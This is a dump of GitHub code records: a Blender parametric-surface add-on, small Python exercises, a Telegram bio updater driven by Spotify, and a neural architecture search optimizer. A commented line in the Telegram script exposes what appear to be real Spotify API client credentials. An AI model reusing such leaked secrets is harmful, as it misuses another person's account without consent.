\"doc_url\": \"https://github.com/WannesMalfait/Blender-Add-ons/wiki/Users#parametric\",\n \"tracker_url\": \"https://github.com/WannesMalfait/Blender-Add-ons/issues\",\n \"version\": (1, 0),\n \"blender\": (2, 90, 0),\n}\n\n\nclass Parameters(bpy.types.PropertyGroup):\n \"\"\"Parameters for the Parametric surface\"\"\"\n Unum : bpy.props.IntProperty(\n name=\"Unum\",\n description=\"Number of u faces\",\n default=20,\n min=1,)\n Vnum : bpy.props.IntProperty(\n name=\"Vnum\",\n description=\"Number of v faces\",\n default=4,\n min=1,)\n u_from : bpy.props.FloatProperty(\n name=\"u from\",\n default = -pi,\n )\n v_from : bpy.props.FloatProperty(\n name=\"v from\",\n default = -0.5,\n )\n u_to : bpy.props.FloatProperty(\n name=\"u to\",\n default = pi,\n )\n v_to : bpy.props.FloatProperty(\n name=\"v to\",\n default = 0.5,\n )\n help_a : bpy.props.StringProperty(\n name= \"a\",\n default = \"2+v*cos(u/2)\",\n )\n help_b : bpy.props.StringProperty(\n name= \"b\",\n default = \"2\",\n )\n x_func : bpy.props.StringProperty(\n name=\"X \",\n default = \"a*cos(u)*b\",\n )\n y_func : bpy.props.StringProperty(\n name=\"Y \",\n default = \"a*sin(u)*b\",\n )\n z_func : bpy.props.StringProperty(\n name=\"Z \",\n default = \"v*sin(u/2)*b\",\n )\n \n Subdivision : bpy.props.IntProperty(\n name=\"Subdivision\",\n description=\"Subdivide the mesh (doesn't increase detail, 0 is no subdivision)\",\n min=0,\n max=6,\n default=0,\n step = 1)\n Smooth_Shading : bpy.props.BoolProperty(\n name=\"Smooth shading\",\n description=\"Set shading to smooth\")\n Merge_Doubles : bpy.props.BoolProperty(\n name=\"Merge Doubles\",\n description=\"Merge duplicated vertices\")\n\n\nclass MESH_OT_add_parametric(bpy.types.Operator, bpy_extras.object_utils.AddObjectHelper):\n \"\"\"Creates the Parametric surface\"\"\"\n bl_idname = \"mesh.add_parametric\"\n bl_label = \"Add a Parametric Surface\"\n bl_options = {'REGISTER', 'UNDO'}\n \n p: bpy.props.PointerProperty(type=Parameters)\n\n def execute(self, context):\n p = self.p\n # mesh arrays\n verts = []\n faces = []\n edges = []\n \n\n Unum = p.Unum\n Vnum = p.Vnum\n\n Uinc = (p.u_to-p.u_from)/Unum\n Vinc = (p.v_to-p.v_from)/Vnum\n \n # Compile the expressions before the loop starts\n a_code = compile(p.help_a, '', 'eval')\n b_code = compile(p.help_b, '', 'eval')\n x_code = compile(p.x_func, '', 'eval')\n y_code = compile(p.y_func, '', 'eval')\n z_code = compile(p.z_func, '', 'eval')\n \n # fill verts array\n u = p.u_from\n for i in range(0, Unum + 1):\n v = p.v_from\n # Superformula\n for j in range(0, Vnum + 1):\n a = eval(a_code)\n b = eval(b_code)\n x = eval(x_code)\n y = eval(y_code)\n z = eval(z_code)\n vert = (x, y, z)\n verts.append(vert)\n # increment phi\n v = v + Vinc\n # increment theta\n u = u + Uinc\n # fill faces array\n count = 0\n for i in range(0, (Vnum + 1) * (Unum)):\n if count < Vnum:\n A = i\n B = i+1\n C = (i+(Vnum+1))+1\n D = (i+(Vnum+1))\n\n face = (A, B, C, D)\n faces.append(face)\n\n count = count + 1\n else:\n count = 0\n\n # create mesh and object\n mymesh = bpy.data.meshes.new(\"Parametric\")\n\n # create mesh from python data\n mymesh.from_pydata(verts, edges, faces)\n mymesh.update(calc_edges=True)\n bpy_extras.object_utils.object_data_add(context, mymesh, operator=self)\n # test\n #go to editmode\n bpy.ops.object.editmode_toggle()\n\n\n # remove duplicate vertices\n if p.Merge_Doubles:\n bpy.ops.mesh.remove_doubles()\n\n # recalculate normals\n bpy.ops.mesh.normals_make_consistent(inside=False)\n #go back to objectmode\n 
bpy.ops.object.editmode_toggle()\n\n # Control the detail level\n if p.Subdivision != 0:\n bpy.ops.object.modifier_add(type='SUBSURF')\n bpy.context.object.modifiers[\"Subdivision\"].levels = p.Subdivision\n if p.Smooth_Shading:\n mypolys = mymesh.polygons\n for p in mypolys:\n p.use_smooth = True\n\n return {\"FINISHED\"}\n\n def draw(self, context):\n layout = self.layout\n col = layout.column(align=True)\n p = self.p\n col.label(text = \"Help variables\")\n col.prop(p, \"help_a\")\n col.prop(p, \"help_b\")\n col.label(text = \"Functions\")\n col.prop(p, \"x_func\")\n col.prop(p, \"y_func\")\n col.prop(p, \"z_func\")\n \n row = layout.row(align=True)\n row.label(text = \"Domain u\")\n row.prop(p, \"u_from\")\n row.prop(p, \"u_to\")\n row = layout.row(align=True)\n row.label(text = \"Domain v\")\n row.prop(p, \"v_from\")\n row.prop(p, \"v_to\")\n \n col = layout.column(align=True)\n # Control over the detail level\n col.label(text=\"Detail level:\")\n col.prop(p, \"Unum\")\n col.prop(p, \"Vnum\")\n col.prop(p, \"Subdivision\")\n col.prop(p, \"Smooth_Shading\")\n col.prop(p, \"Merge_Doubles\")\n\ndef addMenu(self, context):\n self.layout.operator(MESH_OT_add_parametric.bl_idname,\n text=\"Add Parametric\",\n icon=\"OUTLINER_OB_SURFACE\")\n\n\nclasses = (\n Parameters,\n MESH_OT_add_parametric,\n)\n\ndef register():\n for cls in classes:\n bpy.utils.register_class(cls)\n bpy.types.VIEW3D_MT_mesh_add.append(addMenu)\n \n\n\ndef unregister():\n for cls in classes:\n bpy.utils.unregister_class(cls)\n bpy.types.VIEW3D_MT_mesh_add.remove(addMenu)\n \n\nif __name__ == \"__main__\":\n register()\n","repo_name":"WannesMalfait/Blender-Add-ons","sub_path":"Parametric.py","file_name":"Parametric.py","file_ext":"py","file_size_in_byte":6472,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"54"} +{"seq_id":"42854832615","text":"import tensorflow as tf\n\nx = tf.Variable(3.0)\n\nwith tf.GradientTape() as tape:\n y = x ** 2 # y = x pow 2\n dy_dx = tape.gradient(y, x)\n dy_dx.numpy()\n print(dy_dx)\n\n# this may still take some time to discover the concepts of\n# AutoDiff\n# see https://en.wikipedia.org/wiki/Automatic_differentiation\n# and https://en.wikipedia.org/wiki/Backpropagation\n","repo_name":"amirrocker/ML-Training-Playground","sub_path":"NNFromScratch/tensorflow_guide/AutomaticDifferentiation.py","file_name":"AutomaticDifferentiation.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72246783522","text":"import numpy as np \nimport state\n\n'''\nclass Move(state.Move):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __repr__(self):\n return \"Move at (%s, %s)\" % (self.x, self.y)\n'''\n\nclass Board(state.State):\n '''\n We denote X by 1, O by -1.\n '''\n\n def __init__(self):\n self.square = [[0 for x in range(3)] for y in range (3)]\n self.to_move = 1\n\n def move(self, move, to_move = None):\n if to_move == None:\n to_move = self.to_move\n\n if move[0] not in [0,1,2]:\n raise Exception(\"Invalid y value\")\n elif move[1] not in [0,1,2]:\n raise Exception(\"Invalid x value\")\n elif to_move not in [-1,1]:\n raise Exception(\"Invalid player\")\n elif self.square[move[0]][move[1]] != 0:\n raise Exception(\"Playing in an opcupied square\")\n else:\n self.square[move[0]][move[1]] = to_move\n self.to_move = -self.to_move\n return self\n\n def value(self):\n '''Determines whether the board has a winner. 
Returns:\n 1 if X wins\n -1 if O wins\n 0 if neither player wins\n Raises an exception if both players win'''\n X_win = False\n O_win = False\n for x in range(3):\n if self.square[x][0] == self.square[x][1] and self.square[x][1] == self.square[x][2] and self.square[x][0] in [-1,1]:\n if self.square[x][0] == 1:\n X_win = True\n else:\n O_win = True\n for y in range(3):\n if self.square[0][y] == self.square[1][y] and self.square[1][y] == self.square[2][y] and self.square[0][y] in [-1,1]:\n if self.square[0][y] == 1:\n X_win = True\n else:\n O_win = True\n if self.square[0][0] == self.square[1][1] and self.square[1][1] == self.square[2][2] and self.square[0][0] in [-1,1]:\n if self.square[0][0] == 1:\n X_win = True\n else:\n O_win = True\n if self.square[0][2] == self.square[1][1] and self.square[1][1] == self.square[2][0] and self.square[0][2] in [-1,1]:\n if self.square[0][2] == 1:\n X_win = True\n else:\n O_win = True\n if X_win and O_win:\n raise Error(\"Bad board\")\n elif X_win:\n return 1\n elif O_win:\n return -1\n else:\n return 0\n\n def is_end(self):\n if self.value() == 0:\n for x in range(3):\n for y in range(3):\n if self.square[x][y] == 0:\n return False\n return True\n else:\n return True\n\n def network_input(self):\n input = []\n for x in range(3):\n for y in range(3):\n if self.square[x][y] == 1:\n input += [[1], [0]]\n elif self.square[x][y] == -1:\n input += [[0], [1]]\n else:\n input += [[0], [0]]\n return np.array(input)\n\n def print_board(self):\n for x in range(3):\n output = \"\"\n for y in range(3):\n if self.square[x][y] == 1:\n output += \"X\"\n elif self.square[x][y] == -1:\n output += \"O\"\n else:\n output += \" \"\n if y < 2:\n output += \"|\"\n print(output)\n if x < 2:\n print(\"-----\")\n\n def valid_moves(self):\n move_list = []\n for x in range(3):\n for y in range(3):\n if self.square[x][y] == 0:\n move_list.append((x,y))\n return move_list\n\ndef print_policy(policy):\n for x in range(3):\n output = \"\"\n for y in range(3):\n if (x,y) in policy.keys():\n output += (\"%.2f\" % policy[(x,y)])\n else:\n output += \"0.00\"\n if y < 2:\n output += \"|\"\n print(output)\n if x < 2:\n print(\"--------------\")\n\n\nraw_move_list = [(0, 0), (0, 1), (0, 2), \\\n (1, 0), (1, 1), (1, 2), \\\n (2, 0), (2, 1), (2, 2)]\nmove_list = []\nfor (x, y) in raw_move_list:\n move_list.append((x, y))\n","repo_name":"JoeJBenton/machine-learning","sub_path":"AlphaZero/tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28592624654","text":"# Programa para ler duas notas e calcular médias\n# Desafio 6 da aula 7\n\ndef medias(notas, testes, nota_corte):\n \"\"\"\n A média final é calculada somando todas as notas dentro da lista e dividido pela quantidade de testes definidos\n \"\"\"\n media_final = sum(notas) / testes\n\n # A resposta final ao usuário vai depender se a média final é menor que a nota de corte ou maior.\n if media_final < nota_corte:\n print(f'\\nA média {media_final:.2f} é mais baixa que a nota de corte. \\033[1mREPROVAÇÃO\\033[m')\n else:\n print(f'\\nA média {media_final:.2f} é maior que a nota de corte. \\033[1mAPROVAÇÃO\\033[m')\n\ndef main():\n\n testes = int(input('Quantas notas serão avaliadas na média? 
Mínimo de 2 notas: '))\n notas = [] # Uma lista vazia que vai receber os números das notas\n maxLengthList = testes # O tamanho máximo da lista vai ser a quantidade de avaliações que foi digitada\n\n nota_corte = float(input('Qual a nota mínima para aprovação? '))\n while len(notas) < maxLengthList:\n \"\"\" \n Enquanto o comprimento da lista 'notas' for menor que a quantidade de avaliações, \n a lista vai continuar recebendo valores\n \"\"\"\n num = float(input('Por favor, digite a nota (utilize ponto \".\" no lugar de vírgulas): '))\n notas.append(num)\n testes+1\n\n media = medias(notas,testes,nota_corte)\n\nmain()","repo_name":"Digitalen-Brasil/Python","sub_path":"Curso em Video/Mundo 1/Aulas/Desafios de aulas/Desafio 7 - Ler notas e média (aula7).py","file_name":"Desafio 7 - Ler notas e média (aula7).py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42751966952","text":"import speech_recognition as sr\r\n\r\ndef takeCommand():\r\n savefile=open('file.txt', 'a')\r\n r= sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Listening...\")\r\n r.pause_threshold = 1\r\n audio = r.listen(source)\r\n \r\n try:\r\n print(\"Recognizing...\")\r\n query= r. recognize_google(audio, language='en-in') \r\n savefile.write(query)\r\n savefile.write(\" \")\r\n savefile.close()\r\n \r\n except Exception as e:\r\n print(e) \r\n print(\"say that again please\")\r\n return \"None\"\r\n return query\r\n \r\nif __name__ == \"__main__\":\r\n query=takeCommand().lower()\r\n ","repo_name":"manish17122000/Python-Basic-Project","sub_path":"Speak and save text.py","file_name":"Speak and save text.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37131838661","text":"\"\"\"\nhttps://www.interviewbit.com/old/problems/burn-a-tree/\nhttps://www.geeksforgeeks.org/burn-the-binary-tree-starting-from-the-target-node/\n\"\"\"\nimport sys\nsys.setrecursionlimit(10**4)\n \nclass Solution:\n \n def solve(self, A, B):\n\n def bottom_up(node, starting):\n if not node:\n return -1, False\n if node.val == starting:\n return 0, True\n\n time_left, burn_left = bottom_up(node.left, starting)\n time_right, burn_right = bottom_up(node.right, starting)\n burn = burn_left or burn_right\n\n if not burn:\n time = max(time_left, time_right)\n else:\n curr = time_left + time_right + 2\n if self.time < curr:\n self.time = curr\n time = time_left if burn_left else time_right\n return time + 1, burn\n\n self.time = 0\n bottom_up(A, B)\n return self.time\n","repo_name":"vishalshirke7/DSA","sub_path":"tree/binary_tree/burn-a-tree-from-leaf.py","file_name":"burn-a-tree-from-leaf.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6080533951","text":"#!/usr/bin/python\n\n\"\"\"\n\tLaunch all the plotting.Plotter class methods.\n\t\n\tThis script is supposed to act as a test for the plotting.Plotter\n\tclass.\n\t\n\"\"\"\n\nimport yahoo\nfrom plotting import Plotter\nimport market\nimport argparse\n\nLOCAL_DATASOURCE = \"yahoo.db3\"\nTEST_SYMBOL = \"ENI.MI\"\n\n\nif __name__=='__main__':\n\n\n\t## plotting ##\n\n\tsource = yahoo.LocalSource(LOCAL_DATASOURCE)\n\tsymbol = market.Symbol(source, TEST_SYMBOL, None, None, matplotlib=True)\n\t\n\tp = Plotter('Simple')\n\tp.draw_simple(symbol)\n\tp.run()\n\t\n\tp = 
Plotter('Candlestick')\n\tp.draw_candlestick(symbol)\n\tp.run()\n\t\n\tp = Plotter('Simple with volume')\n\tp.draw_simple_with_volume(symbol)\n\tp.run()\n\t\n\tp = Plotter('Simple with volume and OBV')\n\tp.draw_simple_with_volume_obv(symbol)\n\tp.run()\n\t\n\tp = Plotter('Moving averages')\n\tp.draw_moving_averages(symbol, [50, 20, 12])\n\tp.run()\n\t\n\tp = Plotter('Moving averages crossover')\n\tp.draw_moving_average_crossover(symbol, 50, 20)\n\tp.run()\n\t\n","repo_name":"anotherMe/pymta","sub_path":"plotting_test_all.py","file_name":"plotting_test_all.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74832343202","text":"#FULL PROJECT BY B_VOTSON FROM B_VOTSON TEAM\r\nisfirst = True\r\ntextname = \"Сейчас играет - \"\r\ntextauthor = \" .Автор: \"\r\ntimebefore = 3\r\nimport spotipy\r\nfrom spotipy.oauth2 import SpotifyOAuth\r\nfrom tkinter import *\r\nimport asyncio\r\nimport time\r\nfrom telethon.sync import TelegramClient\r\nfrom telethon.tl.functions.account import *\r\n\r\nimport threading\r\nison = True\r\nfrom idlelib.tooltip import Hovertip\r\n\r\n# Инициализация объекта Spotipy\r\n#sp = spotipy.Spotify(auth_manager=SpotifyOAuth(client_id='5c2fa33e816441f68e51540561e605ae', client_secret='9fd28d95c3af45e39bce47b1844eb89d', redirect_uri='http://bvotson.byethost7.com', scope='user-read-currently-playing'))\r\nsp = spotipy.Spotify(auth_manager=SpotifyOAuth(client_id='YOUR-SPOTIFY-CLIENT-ID', client_secret='YOUR-SPOTIFY-CLIENT-SECRET', redirect_uri='http://bvotson.byethost7.com', scope=\"user-read-currently-playing\"))\r\n# Получение информации о текущем треке\r\ncurrent_track = sp.current_user_playing_track()\r\n\r\nroot = Tk()\r\ndef updatesettings():\r\n global textname\r\n global textauthor\r\n global timebefore\r\n textname = e4.get()\r\n textauthor = e5.get()\r\n timebefore = e3.get()\r\n print(\"SAVED SETTINGS\")\r\ndef isonchange():\r\n global ison\r\n ison = not ison\r\n#Okno nahui===================\r\nl1 = Label(text='NRF StatusBar')\r\nl2 = Label(text=\"Наведитесь для полной информации\")\r\nHovertip(l2, '''\r\nСкрипт B_Votson Team для Telegram на Windows.\r\nКаждые n секунд скрипт вызывает окно с названием трека Spotify или любого другого плеера и обновляет информацию о нем в био.\r\n''', hover_delay=100)\r\nl3 = Label(text=\"Задержка обновления\")\r\ne3 = Entry()\r\nl4 = Label(text=\"Текст с указанием названия\")\r\ne4 = Entry()\r\nl5 = Label(text=\"Текст для указания автора\")\r\ne5 = Entry()\r\nbupdate = Button(text=\"Сохранить настройки\", command=updatesettings)\r\nbison = Button(text=\"Включить/Выключить\", command=isonchange)\r\nl1.pack()\r\nl2.pack()\r\nl3.pack()\r\ne3.pack()\r\nl4.pack()\r\ne4.pack()\r\nl5.pack()\r\ne5.pack()\r\nbupdate.pack()\r\nbison.pack()\r\n\r\n\r\n#=============================\r\n\r\n# Use your own values from my.telegram.org\r\napi_id = 123 #CHANGE FOR YOUR TELEGRAM APPLICATION\r\napi_hash = 'YOUR APPLICATION HASH'\r\nprint(\"Nerif Project Status Bar\")\r\n# The first parameter is the .session file name (absolute paths allowed)\r\ndef setabout(name, author):\r\n global isfirst\r\n global textauthor\r\n global textname\r\n with TelegramClient('BVTelegram', api_id, api_hash) as client:\r\n if isfirst:\r\n client.send_message('me', 'Было запущено приложение Nerif Project StatusBar Beta от B_Votson Team. Все права на скрипт принадлежат B_Votson Team. Сайт: http://bvotson.byethost7.com . Сайт проекта: nerifproject.22web.org. 
Удачного использования.')\r\n isfirst = False\r\n client(UpdateProfileRequest(\r\n about = textname + name + textauthor + author\r\n ))\r\ndef setstandart():\r\n with TelegramClient('BVTelegram', api_id, api_hash) as client:\r\n \r\n client(UpdateProfileRequest(\r\n about = \"\"\r\n ))\r\ndef loop1():\r\n while True:\r\n global ison\r\n loop = asyncio.new_event_loop()\r\n asyncio.set_event_loop(loop)\r\n while ison == True:\r\n global timebefore\r\n \r\n time.sleep(int(timebefore))\r\n if current_track is not None:\r\n name = current_track['item']['name']\r\n author = current_track['item']['artists'][0]['name']\r\n setabout(name, author) \r\n print(\"TRACKED\")\r\n \r\n setstandart()\r\n \r\n \r\n\r\n\r\n\r\n\r\nt = threading.Thread(target=loop1, args=())\r\nt.start()\r\nroot.mainloop()","repo_name":"BVotson/Nerif-StatusBar","sub_path":"nerifstatusbarforgit.py","file_name":"nerifstatusbarforgit.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73507508961","text":"import time\nimport os\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom apex.fp16_utils import to_python_float\nfrom time import time\n\nfrom util import utils\nfrom surrogate import SurrogateLinear\n\n\nclass UNAS(object):\n def __init__(self, model, alpha, args, writer, logging):\n self.args = args\n self.model = model\n self.alpha = alpha\n self.logging = logging\n self.arch_optimizer = torch.optim.Adam(self.alpha.parameters(), lr=args.arch_learning_rate,\n weight_decay=args.arch_weight_decay)\n\n self.arch_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(\n self.arch_optimizer, float(args.epochs), eta_min=args.arch_learning_rate_min)\n\n self.latency_cost = args.target_latency > 0.\n self.target_latency = args.target_latency\n if self.latency_cost or self.args.meta_loss == 'relax':\n assert args.meta_loss in {'relax', 'rebar', 'reinforce'}, 'this is only implemented for rebar and reinforce'\n normal_size, reduce_size = self.alpha.module.alphas_size()\n alpha_size = normal_size + reduce_size\n self.surrogate = SurrogateLinear(alpha_size, self.logging).cuda()\n self.latency_pred_loss = utils.AverageMeter()\n self.latency_value = utils.AverageMeter()\n self.latency_coeff = args.latency_coeff\n self.latency_coeff_curr = None\n self.num_repeat = 10\n self.latency_batch_size = 24\n assert self.latency_batch_size <= args.batch_size\n self.num_arch_samples = 10000\n # print('***************** change the number of samples *******')\n # self.num_arch_samples = 200\n self.surrogate_not_train = True\n\n self.latency_actual = []\n self.latency_estimate = []\n\n # Extra layers, if any.\n self.meta_loss = args.meta_loss\n\n # weights generalization error\n self.gen_error_alpha = args.gen_error_alpha\n self.gen_error_alpha_lambda = args.gen_error_alpha_lambda\n\n # Get the meta learning criterion.\n if self.meta_loss in ['default', 'rebar', 'reinforce']:\n self.criterion = nn.CrossEntropyLoss(reduction='none')\n self.criterion = self.criterion.cuda()\n\n if self.meta_loss == 'reinforce':\n self.exp_avg1 = utils.ExpMovingAvgrageMeter()\n self.exp_avg2 = utils.ExpMovingAvgrageMeter()\n\n self.alpha_loss = args.alpha_loss\n\n # Housekeeping.\n self.loss = None\n self.accuracy = None\n self.count = None\n self.loss_diff_sign = None\n self.reset_counter()\n self.report_freq = args.report_freq\n self.writer = writer\n\n def reset_counter(self):\n \"\"\"Resets counters.\"\"\"\n self.count = 0\n self.loss = 
utils.AverageMeter()\n self.accuracy = utils.AverageMeter()\n self.loss_diff_sign = utils.AverageMeter()\n if self.latency_cost:\n self.latency_pred_loss = utils.AverageMeter()\n self.latency_value = utils.AverageMeter()\n\n if self.meta_loss == 'relax':\n self.relax_pred_loss = utils.AverageMeter()\n\n def mean_accuracy(self):\n \"\"\"Return mean accuracy.\"\"\"\n return self.accuracy.avg\n\n def compute_latency(self, train_batch, discrete_weight):\n discrete_indices = self.model.module.get_indices(discrete_weight)\n self.model.eval()\n train_batch = train_batch[:self.latency_batch_size]\n elapsed_time = np.zeros(self.num_repeat)\n with torch.no_grad():\n for i in range(self.num_repeat):\n torch.cuda.synchronize()\n start = time()\n tmp = self.model.module.fast_forward(train_batch, discrete_indices)\n torch.cuda.synchronize()\n end = time()\n elapsed_time[i] = (end - start)\n\n self.model.train()\n return np.median(elapsed_time) * 1000\n\n def train_surrogate(self, train_batch):\n # measure\n self.logging.info('collecting latency samples')\n past_alphas = []\n past_target = []\n\n for i in range(self.num_arch_samples):\n with torch.no_grad():\n weights = self.alpha(1)\n disc_weights = self.alpha.module.discretize(weights)\n latency = self.compute_latency(train_batch, disc_weights)\n alphas = self.alpha.module.get_arch_sample(disc_weights)\n past_alphas.append(alphas.cpu())\n past_target.append(torch.FloatTensor([latency]))\n if i % 100 == 0:\n self.logging.info('collected %d samples' % i)\n\n all_alphas = torch.cat(past_alphas, dim=0)\n all_target = torch.cat(past_target, dim=0)\n\n num_train = int(0.8 * self.num_arch_samples)\n test_alphas = all_alphas[num_train:]\n test_target = all_target[num_train:]\n train_alphas = all_alphas[:num_train]\n train_target = all_target[:num_train]\n\n self.surrogate.learn(train_alphas, train_target, test_alphas, test_target)\n self.surrogate.eval()\n self.surrogate_not_train = False\n\n def training_obj(self, train, train_target, weights, model_opt, val, val_target, global_step):\n if not self.gen_error_alpha:\n logits = self.model(train, weights)\n loss = self.criterion(logits, train_target)\n accuracy = utils.accuracy(logits, train_target)[0]\n loss1, loss2 = loss, torch.zeros_like(loss)\n else:\n logits_train = self.model(train, weights)\n loss_train = self.criterion(logits_train, train_target)\n\n logits_val = self.model(val, weights)\n loss_val = self.criterion(logits_val, val_target)\n\n loss2 = torch.abs(loss_val - loss_train)\n self.loss_diff_sign.update(torch.mean(((loss_val - loss_train) > 0).float()).data)\n loss1 = loss_train\n loss = loss1 + self.gen_error_alpha_lambda * loss2\n accuracy = utils.accuracy(logits_train, train_target)[0]\n\n if self.alpha_loss:\n alpha_loss = self.alpha.module.alpha_loss(weights)\n loss += self.args.alpha_loss_lambda * alpha_loss\n\n if self.count % self.report_freq == 0:\n self.writer.add_scalar(\n 'meta/alpha_loss', torch.mean(alpha_loss), global_step)\n\n return loss, accuracy, loss1, loss2\n\n def step(self, input_valid, target_valid, global_step, weights, input_valid2=None, target_valid2=None, model_opt=None):\n \"\"\"Optimizer for the architecture params.\"\"\"\n self.arch_optimizer.zero_grad()\n if self.meta_loss == 'default':\n loss, accuracy, loss1, loss2 = self.training_obj(input_valid, target_valid, weights, model_opt,\n input_valid2, target_valid2, global_step)\n loss, loss1, loss2 = torch.mean(loss), torch.mean(loss1), torch.mean(loss2)\n elif self.meta_loss == 'rebar':\n # compute loss with 
discrete weights\n with torch.no_grad():\n disc_weights = {\n 'normal': weights['dis_normal'], 'reduce': weights['dis_reduce']}\n\n loss_disc, accuracy, loss1, loss2 = self.training_obj(input_valid, target_valid, disc_weights,\n model_opt, input_valid2, target_valid2, global_step)\n\n # compute baseline\n loss_cont, _, _, _ = self.training_obj(input_valid, target_valid, weights,\n model_opt, input_valid2, target_valid2, global_step)\n\n reward = (loss_disc - loss_cont).detach()\n log_q_d = self.alpha.module.log_prob(weights)\n loss = torch.mean(log_q_d * reward) + torch.mean(loss_cont)\n loss1, loss2 = torch.mean(loss1), torch.mean(loss2)\n\n if self.latency_cost:\n # train the surrogate function initially.\n if self.surrogate_not_train:\n self.train_surrogate(input_valid)\n\n # sample a single architecture sample\n weight_lat = self.alpha(1)\n disc_weights_lat = {'normal': weight_lat['dis_normal'], 'reduce': weight_lat['dis_reduce']}\n\n # compute latency for the discrete weights.\n elapsed_time = self.compute_latency(input_valid, disc_weights_lat)\n # latency prediction for continuous weights\n self.surrogate.eval()\n alphas = self.alpha.module.get_arch_sample(weight_lat)\n latency_cont = self.surrogate(alphas)\n # latency prediction for discrete weights\n alphas = self.alpha.module.get_arch_sample(disc_weights_lat)\n latency_discrete = self.surrogate(alphas)\n surrogate_loss = torch.mean(torch.abs(elapsed_time - latency_discrete.squeeze(1)))\n\n self.latency_coeff_curr = self.latency_coeff * max(min(global_step / self.args.latency_iter, 1.0), 0.)\n loss_disc_lat = self.latency_coeff_curr * torch.relu(torch.Tensor([elapsed_time]).cuda() - self.target_latency)\n loss_cont_lat = self.latency_coeff_curr * torch.relu(latency_cont[0] - self.target_latency)\n\n # collect latency information\n self.latency_pred_loss.update(utils.reduce_tensor(surrogate_loss.data, self.args.world_size))\n self.latency_value.update(elapsed_time)\n\n self.latency_actual.append(elapsed_time)\n self.latency_estimate.append(latency_discrete.squeeze(1).data.cpu().numpy()[0])\n\n if global_step % 50 == 0:\n self.logging.info('latency_pred_loss %f' % np.mean(np.abs(np.array(self.latency_actual)[-50:] - np.array(self.latency_estimate)[-50:])))\n\n # saving some latency info\n if global_step % 1000 == 100 and self.args.local_rank == 0:\n import pickle\n print('saving')\n with open(os.path.join(self.args.save, 'latency.pkl'), 'wb') as f:\n pickle.dump([self.latency_actual, self.latency_estimate, global_step], f)\n\n reward = (loss_disc_lat - loss_cont_lat).detach()\n log_q_d = self.alpha.module.log_prob(weight_lat)\n loss = loss + torch.mean(log_q_d * reward) + torch.mean(loss_cont_lat)\n\n elif self.meta_loss == 'reinforce':\n # compute loss with discrete weights\n with torch.no_grad():\n disc_weights = self.alpha.module.discretize(weights)\n loss_disc, accuracy, loss1, loss2 = self.training_obj(input_valid, target_valid, disc_weights,\n model_opt, input_valid2, target_valid2,\n global_step)\n\n reduce_loss_disc = utils.reduce_tensor(loss_disc.data, self.args.world_size)\n avg = torch.mean(reduce_loss_disc).detach()\n baseline = self.exp_avg1.avg\n # update the moving average\n self.exp_avg1.update(avg)\n reward = (loss_disc - baseline).detach()\n log_q_d = self.alpha.module.log_prob(weights)\n loss = torch.mean(log_q_d * reward) + baseline\n loss1, loss2 = torch.mean(loss1), torch.mean(loss2)\n\n if self.latency_cost:\n weight_lat = self.alpha(1)\n disc_weights_lat = self.alpha.module.discretize(weights)\n elapsed_time = 
self.compute_latency(input_valid, disc_weights_lat)\n self.latency_coeff_curr = self.latency_coeff * min(global_step / self.args.latency_iter, 1.0)\n loss_disc_lat = self.latency_coeff_curr * elapsed_time\n self.latency_value.update(elapsed_time)\n\n baseline = self.exp_avg2.avg\n # update the moving average\n self.exp_avg2.update(float(loss_disc_lat))\n reward = loss_disc_lat - baseline\n log_q_d = self.alpha.module.log_prob(weight_lat)\n loss = loss + torch.mean(log_q_d * reward) + baseline\n loss1, loss2 = torch.mean(loss1), torch.mean(loss2)\n\n entropy_loss = self.alpha.module.entropy_loss(weights)\n\n # Backward pass and update.\n loss.backward()\n self.arch_optimizer.step()\n # Logging.\n reduced_loss = utils.reduce_tensor(loss.data, self.args.world_size)\n accuracy = utils.reduce_tensor(accuracy, self.args.world_size)\n\n self.loss.update(to_python_float(reduced_loss), 1)\n self.accuracy.update(to_python_float(accuracy), 1)\n self.count += 1\n if self.count % self.report_freq == 0:\n self.logging.info('Meta Loss:%s %03d %e %f', self.meta_loss,\n self.count, self.loss.avg, self.accuracy.avg)\n self.writer.add_scalar('meta/loss', self.loss.avg, global_step)\n self.writer.add_scalar('meta/acc', self.accuracy.avg, global_step)\n self.writer.add_scalar('meta/lr', self.arch_optimizer.state_dict()['param_groups'][0]['lr'], global_step)\n self.writer.add_scalar('meta/entropy', entropy_loss, global_step)\n\n if self.gen_error_alpha:\n self.writer.add_scalar('meta/loss_val', loss1, global_step)\n self.writer.add_scalar('meta/loss_cov', loss2, global_step)\n self.writer.add_scalar('meta/loss_diff_sign', self.loss_diff_sign.avg, global_step)\n\n if self.latency_cost:\n self.writer.add_scalar('meta/latency_time', self.latency_value.avg, global_step)\n self.writer.add_scalar('meta/latency_prediction_loss', self.latency_pred_loss.avg, global_step)\n self.writer.add_scalar('meta/latency_coeff', self.latency_coeff_curr, global_step)\n","repo_name":"NVlabs/unas","sub_path":"unas.py","file_name":"unas.py","file_ext":"py","file_size_in_byte":14110,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"54"} +{"seq_id":"15718478395","text":"from cocos.batch import BatchNode\nfrom cocos.layer import Layer, director\nfrom cocos.sprite import Sprite\nimport cocos.collision_model as CollisionModel\nfrom app.logic.enemy import Enemy\nfrom app.logic.hud import HUD\nfrom 